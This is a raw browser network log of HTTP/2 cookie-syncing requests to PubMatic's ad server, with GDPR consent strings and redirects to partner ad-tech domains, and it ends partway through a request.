GET /AdServer/ImgSync?p=160295&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&pu=https%3A%2F%2Fcs.yellowblue.io%2Fcs%3Faid%3D11576%26id%3D%23PMUID&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA HTTP/2.0
host: image8.pubmatic.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://pbs-cs.yellowblue.io/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 302

content-type: text/html; charset=utf-8
location: /AdServer/ImgSync?p=160295&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&pu=https%3A%2F%2Fcs.yellowblue.io%2Fcs%3Faid%3D11576%26id%3D%23PMUID&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&rdf=1
set-cookie: KTPCACOOKIE=YES; domain=pubmatic.com; path=/; max-age=86400; secure;
date: Sun, 26 May 2024 02:06:56 GMT
GET

https://image8.pubmatic.com/AdServer/ImgSync?p=160295&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&pu=https%3A%2F%2Fcs.yellowblue.io%2Fcs%3Faid%3D11576%26id%3D%23PMUID&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&rdf=1

Request

GET /AdServer/ImgSync?p=160295&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&pu=https%3A%2F%2Fcs.yellowblue.io%2Fcs%3Faid%3D11576%26id%3D%23PMUID&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&rdf=1 HTTP/2.0
host: image8.pubmatic.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://pbs-cs.yellowblue.io/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:56 GMT
content-length: 0
GET

https://image8.pubmatic.com/AdServer/ImgSync?p=159706&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&us_privacy=&pu=https%3A%2F%2Fonetag-sys.com%2Fmatch%2F%3Fint_id%3D114%26gdpr%3D${GDPR}%26gdpr_consent%3D${GDPR_STRING}%26uid%3D%23PMUID

Request

GET /AdServer/ImgSync?p=159706&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA